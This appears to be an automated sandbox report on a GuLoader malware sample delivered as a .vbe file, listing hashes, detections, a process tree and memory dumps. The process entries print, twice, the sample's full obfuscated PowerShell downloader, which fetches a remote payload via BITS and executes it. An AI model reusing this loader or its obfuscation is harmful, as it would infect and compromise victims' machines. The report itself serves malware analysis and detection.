Resubmissions

11-12-2023 17:03

231211-vk7zhsecb2 10

11-12-2023 09:42

231211-lpcvhacef5 10

Analysis

  • max time kernel
    300s
  • max time network
    302s
  • platform
    windows10-1703_x64
  • resource
    win10-20231020-en
  • resource tags

    arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
  • submitted
    11-12-2023 17:03

General

  • Target

    DH-087481 IMG.vbe

  • Size

    81KB

  • MD5

    b0e1835d06d4ae28eb1e1cee627360ea

  • SHA1

    31c82a2038f281fcc43377706d00c79c1d07bcee

  • SHA256

    34f4d416f700e77ef730f4ee4207218e7a3f978fc40efd8b7a399d58113d26b5

  • SHA512

    506479a1dd46f52000a175b779c1882610e432bfa4341ce0e4eaca975b9cc7f1ae45618bd68cfe934484e2347c2f9cb070c6e8b0c01938134a7fa7047a1c23df

  • SSDEEP

    1536:vZL/8DxkbzqcfC+bxucaTm1oF65imB6WgF8/SEcLuwI4u7293H:Br8DxMzpf5xuha1oFuiG6hyKJpI4uy93

Score
10/10

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DH-087481 IMG.vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function scrophularia9 ($pollyannish){$Exallotriotebenholtsfljten = $pollyannish.Length-1; For ($Exallotriote=6; $Exallotriote -lt $Exallotriotebenholtsfljten){$Svmmeblre=$Svmmeblre+$pollyannish.Substring( $Exallotriote, 1);$Exallotriote+=7;}$Svmmeblre;}$Oinologies=scrophularia9 'Fluoroh KindetFestlit PunktpGrnsef:perenn/Benytt/EngluerPindsva Ligkac Letmak UnroboDowereoSeriernKabelt.SharpsnPotoroeNonenetDitchb/InternwBlaaalpCister-SickweiHuldsaninfantcElektrlBrombeuBrilladMetameeBehandsEksami/PreconfLukkeloTightfnEconomt Fredss Rewea/explosMMedalli ChantlGlendajcardiom DreadiAnkerpnUnanimiTillitsSabotetPensive Nakitr hayrai RakinuCpddkemBluenesscliff.NonrevmBrandssroperio Kiefo ';$Svmmeblre01=scrophularia9 'VoldsfiSkammeeHukommxPolyto ';$Uncontemporaneously = scrophularia9 'Brudne\meetabs DepriyVajinhs AssocwPrdispoBeridewTracer6 Payni4Hoseur\IngensWSemiauidaintinTinajadhunknsoRowellwMilionsBesiddPforbasosukkerwHabdalemechanranklagS fulfihTidsaleSporoslBirdsol Psych\BrolggvTranvi1Raagum.Chamoi0Hondur\UdmntepagtersoMikroswLaridseKonomirUnenras HumanhIldeseeBrystpl BjerglWordis.MoniedeSymaskxAdgangeFinoch ';. ($Svmmeblre01) (scrophularia9 ' Phyll$ NoncaMHemocyoGomutitBroadaotonguerwhencebGlatbaaBackcaaStatssdJuleka2Skatte=Isoque$AntiopeCirrocnEmphatvLimone:DefuzewdiagoniMattedntidiesdSwashei HoffmrHjemvi ') ;. ($Svmmeblre01) (scrophularia9 'Indkom$CranehUAvocadnAutonocCircumoFjortenTungmetKolonie RessamArchonpBagstroMedbrirUtaalmarecitenBuggyaeBevaeboNukleauByguersPolygolUnprivy Indpr=Gyrati$DjalmaMFurtheoDiscustAutodioOxidisrSkrmdibUgelnna Helika UnpoedKonsul2noncur+Dogmat$lydlseUIntrafnRosenscchromooRvetornTurriftDurabieVrgedem EmprepKlkkero PreclrCibolzaAchroinIdeoloeTingfaoArbejdustraalsMenololLinettyPropar ') ;& ($Svmmeblre01) (scrophularia9 'Opgave$OverciOCalyxedLysteleInvasisOstiae Gangl=Tapper Faunol(Maatte(XylofogFagklawBlokkam AbsceiLokali KapselwTilspiiRikardnReenco3Talles2netvin_Obsessp extrar TordeoFetialcCleavee BurglsBrattesIndust Cityf-PletteFStratu UnshakPOptatirPartioo Fodtuc MlkeheStormasRuslansStemmeISassagdAbranc= Misvi$Preppi{CarlylPDetermI DrapeD Ortho}Unbust)Tunghr.KidnapC Wieldo IkrafmSmagsamFngsela GtemanLegerid AandsLBrumbaiKilobinGarnise Levne)Demetr Intral-HeraclsTransppStatselPrioriiInconst Anstt Ideol[AlderscResonehTopforafstemnrPropod]rrende3Gttevr4Sclero ');& ($Svmmeblre01) (scrophularia9 ' kbsla$KoncerVeternai GladynPremodtSrgesae Vaughr brach Cathea=Sprogb Brndeo$TautolOTimetadStrelieBegoalsForeth[Myoper$TumoroOForhaldBerrineFrowsmsPoliti.excentcNonrecoPholiduFlervenOffenttSteved- Inter2Coturn]Eiasor ');& ($Svmmeblre01) (scrophularia9 'Oxychl$VertebNAllocha JudictjacamauPrposirGruesoe StraflBerigns StatskCardioeInfurirDegenenStenogeRepert=Optima(QuantaTNaelkaeCountes CounttSmeeky-KnsdelPMorinaahumourtRatstrhDiverg cellu$ApotekUCinnalnParadoc ArbejoTyndtan MarketAppoineRhesusmCovetaphusmodoJudsonrStedfdaMerribn HvnineEmissio BevisuAggressPoultslHeiintyKitsch) Hensl Under-FlapdrA smigenNonherd Mutil Copybo(Shpteo[ChristI GuttunBetragt ClarePIndustt uncrirSnuppe]outhea:Skttea: SkppesExopteiTrosbezPolemieFransk Folke- NonapeInvertqupheal Drosch8Klitpl)Underk ') ;if ($Naturelskerne) {& $Uncontemporaneously $Vinter;} else {;$Svmmeblre00=scrophularia9 'HypidiSEncamptSmidigaAvengerextemptAccele-CodlinB PachyiVkkeretSpectrsFjteraT Mejetr Jobbea EkshinTurgois WyoutfDyrplaeEksekurQueeni Vasil- TeatrSInsertoYohimbu SprngrAgterucUbeboeelukker Fuske$ AcharOJordoniferritnConcepogoatmal Somnio Uvejrg Stenfitilsige vildtsRekind Readie-TordenDEfterle motorsStrafpt MiddeirumpernNonconaAfgangtEtaersiDissekoFaktornLaanef Ebcasc$ForkorM SelvfoOvergatHyndesoPhilomrGuestib PerniabemandaInvulndFrimur2Misact ';& ($Svmmeblre01) (scrophularia9 ' Editr$ HavfrMinsignoMusikttSuleimomadamdrMistrabFibrouaAdenovaSystemdRetrot2Infice=Pseudo$ Forbie TrawanHypogyvRegnes:Choltra Bodemp GratipBladnidtournaaSteddatUnoffea Dekin ') ;& ($Svmmeblre01) (scrophularia9 'GstgivI Gabbim autaxp AmortoriantsrKulturtNagelf-FlorerMBiconcoNonpardBlotteuBundsklGaestfeNonocc UncrowBSelektiBjernetFinanssMonarcT PrivarUnconcaSubumbnAfrusts validfUdsugeeChalinrOmsorg ') ;$Motorbaad2=$Motorbaad2+'\Burnsian.Ena';while (-not $Luxemburgsk) {. ($Svmmeblre01) (scrophularia9 'Chymou$JajmanLunavnguUnvextxHertugeValfarmFennerb SaprouUtilstr Odgergmartins Leverkskyldn=simult(ModellTCoddinetvrstrs CrambtNezita-ReginaPCompena LepidtUnservhfilari Asylby$ UphasM Evindo RomantTidsruoBombesrInherebTvangsaSufficaBallondMultic2Rosett)Antior ') ;.($Svmmeblre01) $Svmmeblre00;.($Svmmeblre01) (scrophularia9 'PyretoSWithert tillbaTebirkr Syvaat anega-NedskrSHypophltredjeePrepsleLavpripChawks Meowed5 Flisk ');}& ($Svmmeblre01) (scrophularia9 'plutok$NedskasgeneracAnstaarBramraoOutroappockethSemicouFritzelEnnoblaUnglidrUnborridiluteaDestin iscrem= terep DennovGDesecre FjendtBudbri- galteCGldspooBurresnklemhatMeldereParallnChuzwitTilsyn Tingen$BallgoMMiroscoOutseat LinjeoWoodnyrTermitbBortkoaKotelea TestudGreenh2imprgn ');&($Svmmeblre01) (scrophularia9 'Betwat$PlacemGgavstruPistoliIldtorlUnderkl DockieTonguemAflbsr Womani= thurs Cancer[CnicusSHvsedeyKalveksNisrestEmbarqeTillavm Petit.DuetteCTerninoOsteotnHelgemv Diskfe SadomrTotalbtEnribo]infame:Stopve:WanganFgarryarImmindoProtodmFldeosBForsvaa GrundsLedsageFiduse6 Schiz4amplifS TestitVenstrrForporiEliminnDapichgStreng(Starva$HexatesAvisovcSdekorr SkjoroSwallopsceuophRatifiu GentilRespekaReskndr Obambi TobauaProxim) Proce ');. ($Svmmeblre01) (scrophularia9 'Widesg$OveratSGalionvRusinemKatalymHissedeKvartsbArtilllValgtyrBttefuePlemoc2Prevos Isoval=Denise Rumfan[ CrystSUtryggyLightesSlbernt MarineSaprogmUlvefo.RecensTKoncene Ggepuxaustrit endev.KsnehaERegistnregistcGobiifo BrydndLilleti Opregneffundg Sport]Vildtr: Naboi:FactorABlodigSBirgitCKrigsuIPitikiI Ufork.MaxilnG Glucoe PainttBrugerS Intert ReorgrFarvepi KnortnunprefgKirkeg(fluvic$EgentlGPrunesuKnebleiJudgmelPensiolOverfaeAnraabmDiurnu)Termog ');. ($Svmmeblre01) (scrophularia9 ' Indek$ VansiP DevilhVeddanl Betroo BuddhrForfalhFormyliUnsaliz PateniBehandnRdmebu=Fakute$ AmoriSMesocavHousehmVirtuomKorsfseForledbVandrelRedbairDelelie Oblig2Sonder.Knugeds PaadruGarageb NydelsSignalt Waterr Ishtai FecunnTotallgBrides(Billyg2Scudde9Candmu9Fintma6Ocypet7Interl1 Unmag,Cipher2Forblf6nonpen0 Hjemm0Beerma5Trisul)Fierce ');. ($Svmmeblre01) $Phlorhizin;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function scrophularia9 ($pollyannish){$Exallotriotebenholtsfljten = $pollyannish.Length-1; For ($Exallotriote=6; $Exallotriote -lt $Exallotriotebenholtsfljten){$Svmmeblre=$Svmmeblre+$pollyannish.Substring( $Exallotriote, 1);$Exallotriote+=7;}$Svmmeblre;}$Oinologies=scrophularia9 'Fluoroh KindetFestlit PunktpGrnsef:perenn/Benytt/EngluerPindsva Ligkac Letmak UnroboDowereoSeriernKabelt.SharpsnPotoroeNonenetDitchb/InternwBlaaalpCister-SickweiHuldsaninfantcElektrlBrombeuBrilladMetameeBehandsEksami/PreconfLukkeloTightfnEconomt Fredss Rewea/explosMMedalli ChantlGlendajcardiom DreadiAnkerpnUnanimiTillitsSabotetPensive Nakitr hayrai RakinuCpddkemBluenesscliff.NonrevmBrandssroperio Kiefo ';$Svmmeblre01=scrophularia9 'VoldsfiSkammeeHukommxPolyto ';$Uncontemporaneously = scrophularia9 'Brudne\meetabs DepriyVajinhs AssocwPrdispoBeridewTracer6 Payni4Hoseur\IngensWSemiauidaintinTinajadhunknsoRowellwMilionsBesiddPforbasosukkerwHabdalemechanranklagS fulfihTidsaleSporoslBirdsol Psych\BrolggvTranvi1Raagum.Chamoi0Hondur\UdmntepagtersoMikroswLaridseKonomirUnenras HumanhIldeseeBrystpl BjerglWordis.MoniedeSymaskxAdgangeFinoch ';. ($Svmmeblre01) (scrophularia9 ' Phyll$ NoncaMHemocyoGomutitBroadaotonguerwhencebGlatbaaBackcaaStatssdJuleka2Skatte=Isoque$AntiopeCirrocnEmphatvLimone:DefuzewdiagoniMattedntidiesdSwashei HoffmrHjemvi ') ;. ($Svmmeblre01) (scrophularia9 'Indkom$CranehUAvocadnAutonocCircumoFjortenTungmetKolonie RessamArchonpBagstroMedbrirUtaalmarecitenBuggyaeBevaeboNukleauByguersPolygolUnprivy Indpr=Gyrati$DjalmaMFurtheoDiscustAutodioOxidisrSkrmdibUgelnna Helika UnpoedKonsul2noncur+Dogmat$lydlseUIntrafnRosenscchromooRvetornTurriftDurabieVrgedem EmprepKlkkero PreclrCibolzaAchroinIdeoloeTingfaoArbejdustraalsMenololLinettyPropar ') ;& ($Svmmeblre01) (scrophularia9 'Opgave$OverciOCalyxedLysteleInvasisOstiae Gangl=Tapper Faunol(Maatte(XylofogFagklawBlokkam AbsceiLokali KapselwTilspiiRikardnReenco3Talles2netvin_Obsessp extrar TordeoFetialcCleavee BurglsBrattesIndust Cityf-PletteFStratu UnshakPOptatirPartioo Fodtuc MlkeheStormasRuslansStemmeISassagdAbranc= Misvi$Preppi{CarlylPDetermI DrapeD Ortho}Unbust)Tunghr.KidnapC Wieldo IkrafmSmagsamFngsela GtemanLegerid AandsLBrumbaiKilobinGarnise Levne)Demetr Intral-HeraclsTransppStatselPrioriiInconst Anstt Ideol[AlderscResonehTopforafstemnrPropod]rrende3Gttevr4Sclero ');& ($Svmmeblre01) (scrophularia9 ' kbsla$KoncerVeternai GladynPremodtSrgesae Vaughr brach Cathea=Sprogb Brndeo$TautolOTimetadStrelieBegoalsForeth[Myoper$TumoroOForhaldBerrineFrowsmsPoliti.excentcNonrecoPholiduFlervenOffenttSteved- Inter2Coturn]Eiasor ');& ($Svmmeblre01) (scrophularia9 'Oxychl$VertebNAllocha JudictjacamauPrposirGruesoe StraflBerigns StatskCardioeInfurirDegenenStenogeRepert=Optima(QuantaTNaelkaeCountes CounttSmeeky-KnsdelPMorinaahumourtRatstrhDiverg cellu$ApotekUCinnalnParadoc ArbejoTyndtan MarketAppoineRhesusmCovetaphusmodoJudsonrStedfdaMerribn HvnineEmissio BevisuAggressPoultslHeiintyKitsch) Hensl Under-FlapdrA smigenNonherd Mutil Copybo(Shpteo[ChristI GuttunBetragt ClarePIndustt uncrirSnuppe]outhea:Skttea: SkppesExopteiTrosbezPolemieFransk Folke- NonapeInvertqupheal Drosch8Klitpl)Underk ') ;if ($Naturelskerne) {& $Uncontemporaneously $Vinter;} else {;$Svmmeblre00=scrophularia9 'HypidiSEncamptSmidigaAvengerextemptAccele-CodlinB PachyiVkkeretSpectrsFjteraT Mejetr Jobbea EkshinTurgois WyoutfDyrplaeEksekurQueeni Vasil- TeatrSInsertoYohimbu SprngrAgterucUbeboeelukker Fuske$ AcharOJordoniferritnConcepogoatmal Somnio Uvejrg Stenfitilsige vildtsRekind Readie-TordenDEfterle motorsStrafpt MiddeirumpernNonconaAfgangtEtaersiDissekoFaktornLaanef Ebcasc$ForkorM SelvfoOvergatHyndesoPhilomrGuestib PerniabemandaInvulndFrimur2Misact ';& ($Svmmeblre01) (scrophularia9 ' Editr$ HavfrMinsignoMusikttSuleimomadamdrMistrabFibrouaAdenovaSystemdRetrot2Infice=Pseudo$ Forbie TrawanHypogyvRegnes:Choltra Bodemp GratipBladnidtournaaSteddatUnoffea Dekin ') ;& ($Svmmeblre01) (scrophularia9 'GstgivI Gabbim autaxp AmortoriantsrKulturtNagelf-FlorerMBiconcoNonpardBlotteuBundsklGaestfeNonocc UncrowBSelektiBjernetFinanssMonarcT PrivarUnconcaSubumbnAfrusts validfUdsugeeChalinrOmsorg ') ;$Motorbaad2=$Motorbaad2+'\Burnsian.Ena';while (-not $Luxemburgsk) {. ($Svmmeblre01) (scrophularia9 'Chymou$JajmanLunavnguUnvextxHertugeValfarmFennerb SaprouUtilstr Odgergmartins Leverkskyldn=simult(ModellTCoddinetvrstrs CrambtNezita-ReginaPCompena LepidtUnservhfilari Asylby$ UphasM Evindo RomantTidsruoBombesrInherebTvangsaSufficaBallondMultic2Rosett)Antior ') ;.($Svmmeblre01) $Svmmeblre00;.($Svmmeblre01) (scrophularia9 'PyretoSWithert tillbaTebirkr Syvaat anega-NedskrSHypophltredjeePrepsleLavpripChawks Meowed5 Flisk ');}& ($Svmmeblre01) (scrophularia9 'plutok$NedskasgeneracAnstaarBramraoOutroappockethSemicouFritzelEnnoblaUnglidrUnborridiluteaDestin iscrem= terep DennovGDesecre FjendtBudbri- galteCGldspooBurresnklemhatMeldereParallnChuzwitTilsyn Tingen$BallgoMMiroscoOutseat LinjeoWoodnyrTermitbBortkoaKotelea TestudGreenh2imprgn ');&($Svmmeblre01) (scrophularia9 'Betwat$PlacemGgavstruPistoliIldtorlUnderkl DockieTonguemAflbsr Womani= thurs Cancer[CnicusSHvsedeyKalveksNisrestEmbarqeTillavm Petit.DuetteCTerninoOsteotnHelgemv Diskfe SadomrTotalbtEnribo]infame:Stopve:WanganFgarryarImmindoProtodmFldeosBForsvaa GrundsLedsageFiduse6 Schiz4amplifS TestitVenstrrForporiEliminnDapichgStreng(Starva$HexatesAvisovcSdekorr SkjoroSwallopsceuophRatifiu GentilRespekaReskndr Obambi TobauaProxim) Proce ');. ($Svmmeblre01) (scrophularia9 'Widesg$OveratSGalionvRusinemKatalymHissedeKvartsbArtilllValgtyrBttefuePlemoc2Prevos Isoval=Denise Rumfan[ CrystSUtryggyLightesSlbernt MarineSaprogmUlvefo.RecensTKoncene Ggepuxaustrit endev.KsnehaERegistnregistcGobiifo BrydndLilleti Opregneffundg Sport]Vildtr: Naboi:FactorABlodigSBirgitCKrigsuIPitikiI Ufork.MaxilnG Glucoe PainttBrugerS Intert ReorgrFarvepi KnortnunprefgKirkeg(fluvic$EgentlGPrunesuKnebleiJudgmelPensiolOverfaeAnraabmDiurnu)Termog ');. ($Svmmeblre01) (scrophularia9 ' Indek$ VansiP DevilhVeddanl Betroo BuddhrForfalhFormyliUnsaliz PateniBehandnRdmebu=Fakute$ AmoriSMesocavHousehmVirtuomKorsfseForledbVandrelRedbairDelelie Oblig2Sonder.Knugeds PaadruGarageb NydelsSignalt Waterr Ishtai FecunnTotallgBrides(Billyg2Scudde9Candmu9Fintma6Ocypet7Interl1 Unmag,Cipher2Forblf6nonpen0 Hjemm0Beerma5Trisul)Fierce ');. ($Svmmeblre01) $Phlorhizin;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5024

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vpywzp0s.atl.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • memory/216-4-0x000001BCF2540000-0x000001BCF2562000-memory.dmp

    Filesize

    136KB

  • memory/216-9-0x000001BCF2B60000-0x000001BCF2BD6000-memory.dmp

    Filesize

    472KB

  • memory/216-8-0x000001BCF22F0000-0x000001BCF2300000-memory.dmp

    Filesize

    64KB

  • memory/216-10-0x000001BCF22F0000-0x000001BCF2300000-memory.dmp

    Filesize

    64KB

  • memory/216-6-0x00007FFBA8B40000-0x00007FFBA952C000-memory.dmp

    Filesize

    9.9MB

  • memory/216-26-0x000001BCF22F0000-0x000001BCF2300000-memory.dmp

    Filesize

    64KB

  • memory/216-147-0x000001BCF22F0000-0x000001BCF2300000-memory.dmp

    Filesize

    64KB

  • memory/216-145-0x000001BCF22F0000-0x000001BCF2300000-memory.dmp

    Filesize

    64KB

  • memory/216-122-0x00007FFBA8B40000-0x00007FFBA952C000-memory.dmp

    Filesize

    9.9MB

  • memory/5024-59-0x0000000008A90000-0x0000000008AAA000-memory.dmp

    Filesize

    104KB

  • memory/5024-34-0x0000000006880000-0x0000000006890000-memory.dmp

    Filesize

    64KB

  • memory/5024-37-0x0000000006C90000-0x0000000006CB2000-memory.dmp

    Filesize

    136KB

  • memory/5024-38-0x0000000007560000-0x00000000075C6000-memory.dmp

    Filesize

    408KB

  • memory/5024-39-0x00000000075D0000-0x0000000007636000-memory.dmp

    Filesize

    408KB

  • memory/5024-40-0x0000000007640000-0x0000000007990000-memory.dmp

    Filesize

    3.3MB

  • memory/5024-41-0x0000000006DC0000-0x0000000006DDC000-memory.dmp

    Filesize

    112KB

  • memory/5024-42-0x0000000006DE0000-0x0000000006E2B000-memory.dmp

    Filesize

    300KB

  • memory/5024-43-0x0000000007C70000-0x0000000007CE6000-memory.dmp

    Filesize

    472KB

  • memory/5024-58-0x0000000009390000-0x0000000009A08000-memory.dmp

    Filesize

    6.5MB

  • memory/5024-32-0x0000000006780000-0x00000000067B6000-memory.dmp

    Filesize

    216KB

  • memory/5024-65-0x0000000008D40000-0x0000000008D62000-memory.dmp

    Filesize

    136KB

  • memory/5024-64-0x0000000008DB0000-0x0000000008E44000-memory.dmp

    Filesize

    592KB

  • memory/5024-66-0x0000000009A10000-0x0000000009F0E000-memory.dmp

    Filesize

    5.0MB

  • memory/5024-109-0x0000000008F50000-0x0000000008F70000-memory.dmp

    Filesize

    128KB

  • memory/5024-36-0x0000000006EC0000-0x00000000074E8000-memory.dmp

    Filesize

    6.2MB

  • memory/5024-124-0x0000000006880000-0x0000000006890000-memory.dmp

    Filesize

    64KB

  • memory/5024-140-0x0000000009130000-0x0000000009142000-memory.dmp

    Filesize

    72KB

  • memory/5024-35-0x0000000006880000-0x0000000006890000-memory.dmp

    Filesize

    64KB

  • memory/5024-33-0x0000000073170000-0x000000007385E000-memory.dmp

    Filesize

    6.9MB

  • memory/5024-148-0x0000000073170000-0x000000007385E000-memory.dmp

    Filesize

    6.9MB

  • memory/5024-149-0x0000000006880000-0x0000000006890000-memory.dmp

    Filesize

    64KB

  • memory/5024-150-0x0000000006880000-0x0000000006890000-memory.dmp

    Filesize

    64KB

  • memory/5024-151-0x0000000006880000-0x0000000006890000-memory.dmp

    Filesize

    64KB

  • memory/5024-152-0x0000000008DA0000-0x0000000008DA1000-memory.dmp

    Filesize

    4KB

  • memory/5024-153-0x0000000009F10000-0x000000000B6E6000-memory.dmp

    Filesize

    23.8MB

  • memory/5024-162-0x0000000009F10000-0x000000000B6E6000-memory.dmp

    Filesize

    23.8MB

  • memory/5024-319-0x00007FFBC5910000-0x00007FFBC5AEB000-memory.dmp

    Filesize

    1.9MB

  • memory/5024-11051-0x0000000006880000-0x0000000006890000-memory.dmp

    Filesize

    64KB

  • memory/5024-28162-0x0000000009F10000-0x000000000B6E6000-memory.dmp

    Filesize

    23.8MB